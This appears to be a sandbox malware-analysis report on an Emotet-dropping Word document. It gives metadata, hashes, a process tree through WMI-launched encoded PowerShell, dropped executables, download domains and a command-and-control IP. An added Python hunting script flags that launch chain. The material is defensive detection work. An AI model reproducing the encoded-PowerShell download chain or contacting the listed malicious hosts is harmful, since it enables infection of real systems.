Field | Value
---|---
File name | 55233404 2019.doc
Full analysis | https://app.any.run/tasks/cc0d19f8-3e48-4bc4-978b-9e88aefcd8b5
Verdict | Malicious activity
Threats | Emotet. It started life as a banking trojan and was rebuilt over the years into a modular loader that drops further malware onto infected hosts. It is spread in mass spam campaigns that mostly hit corporate networks, but private users are infected as well.
Analysis date | October 09, 2019, 13:29:12
OS | Windows 7 Professional Service Pack 1 (build 7601, 32-bit)
Tags | —
Indicators | —
MIME | application/msword
File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: Customer, Subject: Intranet, Author: Angelita Dickinson, Keywords: navigate, Comments: streamline, Template: Normal.dotm, Last Saved By: Tanya Olson, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Oct 9 07:30:00 2019, Last Saved Time/Date: Wed Oct 9 07:30:00 2019, Number of Pages: 1, Number of Words: 29, Number of Characters: 170, Security: 0
MD5 | D79778B3D978AA058FB6B2C539E2E87E
SHA1 | 6C596024CB90ED0CD4994974A86CD00A89E5A960
SHA256 | 3AB0D7EEC7EF409F9BBEBC3A5F3082EB2A2AB2C802BF3D283451376BEEF3C328
SSDEEP | 6144:4Qc46uhMDYhLkI07NSU4jJnrATfD1BrS4uhU5zueLEkFhE:4Qc4eDEX07NSU4VEP1I4ukFS
File type identification:

Extension | Description | Match score
---|---|---
.doc | Microsoft Word document | 54.2
.doc | Microsoft Word document (old ver.) | 32.2
Document metadata. CreateDate and ModifyDate are identical, RevisionNumber is 1 and TotalEditTime is empty, so the file was generated and saved once rather than edited in Word over time; Title, Subject, Keywords and Comments each hold a single unrelated dictionary word.

Property | Value
---|---
CompObjUserType | Microsoft Word 97-2003 Document
CompObjUserTypeLen | 32
Manager | Zboncak
HeadingPairs | —
TitleOfParts | —
HyperlinksChanged | No
SharedDoc | No
LinksUpToDate | No
ScaleCrop | No
AppVersion | 16
CharCountWithSpaces | 198
Paragraphs | 1
Lines | 1
Company | Altenwerth, Veum and Armstrong
CodePage | Windows Latin 1 (Western European)
Security | None
Characters | 170
Words | 29
Pages | 1
ModifyDate | 2019:10:09 06:30:00
CreateDate | 2019:10:09 06:30:00
TotalEditTime | —
Software | Microsoft Office Word
RevisionNumber | 1
LastModifiedBy | Tanya Olson
Template | Normal.dotm
Comments | streamline
Keywords | navigate
Author | Angelita Dickinson
Subject | Intranet
Title | Customer
Process tree (every process ran as user admin at MEDIUM integrity; the base64 argument of the PowerShell command is not reproduced here):

PID | Command line | Path | Parent process | Description (Company) | Version | Exit code
---|---|---|---|---|---|---
3184 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\55233404 2019.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | explorer.exe | Microsoft Word (Microsoft Corporation) | 14.0.6024.1000 | —
2572 | powershell -enco … | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | Windows PowerShell (Microsoft Corporation) | 6.1.7600.16385 (win7_rtm.090713-1255) | 0
2172 | "C:\Users\admin\993.exe" | C:\Users\admin\993.exe | powershell.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
2656 | --c440da71 | C:\Users\admin\993.exe | 993.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
2584 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | 993.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
1088 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
1652 | "C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe" | C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe | msptermsizes.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
3000 | --72acc59c | C:\Users\admin\AppData\Local\msptermsizes\yqdfjuv9ikmkoxv6a.exe | YQDfJUV9iKmkoXV6a.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
996 | "C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe" | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | yqdfjuv9ikmkoxv6a.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | 0
3164 | --f91b2738 | C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe | msptermsizes.exe | Monkey Head Media Stream (Monkey Head Software) | 1, 0, 0, 1 | —

Reading the chain: powershell.exe is not a child of WINWORD.EXE but of wmiprvse.exe, which means the macro started it through WMI (Win32_Process) and any rule that keys on a direct Word-to-PowerShell parent link misses it. PowerShell is the only process that reaches thinktobehappy.com and www.bonvies.com (see the network table below) and is the parent of 993.exe. 993.exe relaunches itself with a --<8 hex digits> argument, drops a copy under %LOCALAPPDATA%\msptermsizes\msptermsizes.exe, and that copy repeats the same relaunch pattern; the relaunched copy at PID 1088 is the instance that writes YQDfJUV9iKmkoXV6a.exe and contacts 91.83.93.105:8080. The dropped files carry a fake "Monkey Head Media Stream" version resource under all three names.
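A hunting rule for the chain shown in this table, as an added example that is not part of the ANY.RUN report. It walks process-creation events (the event list is constructed from the PIDs, images, command lines and parents above, with the constructed token `<removed>` standing in for the base64 payload the page does not reproduce) and flags the three things the table exhibits: PowerShell started with any spelling of -EncodedCommand while parented by WmiPrvSE.exe, a binary relaunching itself with a `--<8 hex digits>` argument, and an image at %LOCALAPPDATA%\<name>\<name>.exe. It generalizes a little beyond this sample: the switch matcher accepts every abbreviation PowerShell itself accepts, and the relaunch check compares image names case-insensitively, which matters because PID 3000 logged its own path in lower case. The decoder is included because a real -EncodedCommand argument is base64 over UTF-16LE; the sample it decodes is constructed, not taken from the page.

```python
"""Process-tree hunting for the Emotet launch chain in the report above.

Added example, not ANY.RUN output. EVENTS is constructed from the process table
(same PIDs, images, command lines and parents); the encoded PowerShell payload is
not on the page, so the constructed token "<removed>" stands in for it.
"""
import base64
import ntpath
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # image path as logged
    cmdline: str
    parent_image: str   # parent image name as the report gives it


EVENTS = [  # constructed from the process table above
    ProcEvent(3184, r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\55233404 2019.doc"',
              "explorer.exe"),
    ProcEvent(2572, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell -enco <removed>", "wmiprvse.exe"),
    ProcEvent(2172, r"C:\Users\admin\993.exe", r'"C:\Users\admin\993.exe"', "powershell.exe"),
    ProcEvent(2656, r"C:\Users\admin\993.exe", "--c440da71", "993.exe"),
    ProcEvent(2584, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
              r'"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"', "993.exe"),
    ProcEvent(1088, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
              "--f91b2738", "msptermsizes.exe"),
    ProcEvent(1652, r"C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe",
              r'"C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe"', "msptermsizes.exe"),
    ProcEvent(3000, r"C:\Users\admin\AppData\Local\msptermsizes\yqdfjuv9ikmkoxv6a.exe",
              "--72acc59c", "YQDfJUV9iKmkoXV6a.exe"),
    ProcEvent(996, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
              r'"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe"', "yqdfjuv9ikmkoxv6a.exe"),
    ProcEvent(3164, r"C:\Users\admin\AppData\Local\msptermsizes\msptermsizes.exe",
              "--f91b2738", "msptermsizes.exe"),
]

# powershell.exe accepts every prefix of -EncodedCommand (-e, -en, -enc, -enco, ...)
# and the -ec alias, so key on the whole family rather than on one spelling.
ENCODED_SWITCHES = {"encodedcommand"[:n] for n in range(1, 15)} | {"ec"}
HEX_RELAUNCH_ARG = re.compile(r"^--[0-9a-f]{8}$")
# %LOCALAPPDATA%\<name>\<name>.exe: the directory name mirrors the file name.
MIRRORED_LOCALAPPDATA = re.compile(r"(?i)\\AppData\\Local\\([^\\]+)\\\1\.exe$")

# Constructed sample of what a real -EncodedCommand argument looks like.
SAMPLE_ENCODED = base64.b64encode("Write-Host 'constructed sample'".encode("utf-16-le")).decode()


def _base(name: str) -> str:
    return ntpath.basename(name).lower()


def has_encoded_switch(cmdline: str) -> bool:
    """True if any switch token after the image is a spelling of -EncodedCommand."""
    return any(t[:1] in "-/" and t.lstrip("-/").lower() in ENCODED_SWITCHES
               for t in cmdline.split()[1:])


def decode_encoded_command(blob: str) -> Optional[str]:
    """-EncodedCommand is base64 over UTF-16LE; returns None when the token is
    not decodable (for instance a placeholder, as on this page)."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt(events: List[ProcEvent]) -> List[Tuple[int, str]]:
    findings = []
    for ev in events:
        img, parent = _base(ev.image), _base(ev.parent_image)
        if img == "powershell.exe" and has_encoded_switch(ev.cmdline):
            # WmiPrvSE as parent means the macro went through WMI (Win32_Process),
            # breaking the WINWORD -> powershell link a naive rule would look for.
            rule = "encoded_powershell_from_wmi" if parent == "wmiprvse.exe" else "encoded_powershell"
            findings.append((ev.pid, rule))
        if img == parent and HEX_RELAUNCH_ARG.match(ev.cmdline.strip()):
            findings.append((ev.pid, "self_relaunch_hex_arg"))
        if MIRRORED_LOCALAPPDATA.search(ev.image):
            findings.append((ev.pid, "mirrored_localappdata_path"))
    return findings


if __name__ == "__main__":
    for pid, rule in hunt(EVENTS):
        print(pid, rule)
    print(decode_encoded_command(SAMPLE_ENCODED))
```

Run it as a script to list the findings per PID. To use it on live telemetry, map Sysmon event ID 1 (process create) or EDR process-create fields onto ProcEvent; nothing in the block touches the network.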
Files written. MSForms.exd under Temp\Word8.0 is the type-library cache Word creates when a document loads an MSForms (VBA UserForm or ActiveX) control, so the macro project uses one; the only new executable recorded is YQDfJUV9iKmkoXV6a.exe, written by the relaunched msptermsizes.exe (PID 1088).

PID | Process | Filename | Type | MD5 | SHA256
---|---|---|---|---|---
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRD21.tmp.cvr | — | — | —
2572 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\PF0T3YDSC4GP9NPLQL77.temp | — | — | —
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BFE837EE.wmf | wmf | D7E4638D3EA569A56E0EFFCD2347BD94 | 3923F9AEA5771D0553E988052E0B6BB6B87A8F54B1756C067CDE8E9F409F5A27
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | B44611264EC284D32C6F03431D7E5BE3 | 0192F2DD6D16F697830849EDB9A6606BC784A7DAF4C85D366F70128064A606F5
3184 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | 6D7637FCFC19C4EBB24C88780E0DDF2F | 6154E11CA5F0A23371E735F7EBC610B7406BA64E350B0BE253C589A608579EE2
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\80879C3D.wmf | wmf | 57CCFA70FBFF60B7B3DBDB1D52D81FB5 | 5EF5E4109A675336EBC9EF3A8E9193913341C449FB71FA30E0D3D63E0EC057F4
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$233404 2019.doc | pgc | 7FC0C2119E51482C272C28B5290506E5 | 178A2B26CC240C9141831977EEF0A55D4AE3CB20DB2D9043B7CA225662E9A32D
1088 | msptermsizes.exe | C:\Users\admin\AppData\Local\msptermsizes\YQDfJUV9iKmkoXV6a.exe | executable | BADA3BF01142A56B6D2C33764C2405D1 | E6630ADFC5882BE333236FD4DA6B8FB8C86866B4768B7914FA9102A3DE3BC3B0
2572 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 57F2BEBD8AB4D14DFF05F8F1EE1B1091 | 24089794FD7207234A86BFD7344771ABD7A0BC15DCEB1A256EF927F010B65B1F
3184 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\DFC1DF06.wmf | wmf | E8F729A41F234E0F91FAC5DBD195EA40 | D1807EA2C463A817C58B6C194EFFE8B77B1E94CCBC8C68A8BFF520C4BFF2E633
Network connections:

PID | Process | IP:port | Domain | ASN | CN | Reputation
---|---|---|---|---|---|---
2572 | powershell.exe | 23.229.230.168:443 | thinktobehappy.com | GoDaddy.com, LLC | US | unknown |
1088 | msptermsizes.exe | 91.83.93.105:8080 | — | Invitech Megoldasok Zrt. | HU | malicious |
2572 | powershell.exe | 35.236.132.124:443 | www.bonvies.com | — | US | unknown |
DNS requests (IPs taken from the connections above):

Domain | IP | Reputation
---|---|---
thinktobehappy.com | 23.229.230.168 | unknown
www.bonvies.com | 35.236.132.124 | unknown
IDS alerts (both fire on the msptermsizes.exe connection to 91.83.93.105:8080):

PID | Process | Class | Message
---|---|---|---
1088 | msptermsizes.exe | A Network Trojan was detected | AV TROJAN W32/Emotet CnC Checkin (Apr 2019) |
1088 | msptermsizes.exe | A Network Trojan was detected | MALWARE [PTsecurity] Feodo/Emotet |